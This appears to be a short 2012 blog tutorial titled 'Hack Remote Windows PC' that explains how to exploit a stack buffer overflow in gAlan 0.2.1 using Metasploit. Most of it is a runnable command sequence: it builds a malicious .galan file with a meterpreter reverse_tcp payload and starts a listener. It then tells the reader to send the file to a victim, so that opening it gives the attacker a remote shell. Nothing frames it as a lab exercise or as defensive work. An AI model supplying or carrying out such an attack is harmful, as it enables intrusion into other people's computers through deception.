Wednesday, December 12, 2012

Hack Remote Windows PC using gAlan 0.2.1 Buffer Overflow

This module exploits a stack buffer overflow in gAlan 0.2.1 by creating a specially crafted galan file.

Exploit Targets
Glan 0.2.1

Requirement
Attacker: Backtrack 5
Victim PC: Windows XP

Open backtrack terminal type msfconsole


Now type 
msf > use exploit/windows/fileformat/galan_fileformat_bof
msf exploit (galan_fileformat_bof)>set payload windows/meterpreter/reverse_tcp
msf exploit (galan_fileformat_bof)>set lhost 192.168.1.2 (IP of Local Host)
msf exploit (galan_fileformat_bof)>exploit



After we successfully generate the malicious galan File, it will stored on your local computer
/root/.msf4/local/msf.galan


Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.2
exploit

Now send your msf.galan files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.

No comments:

Post a Comment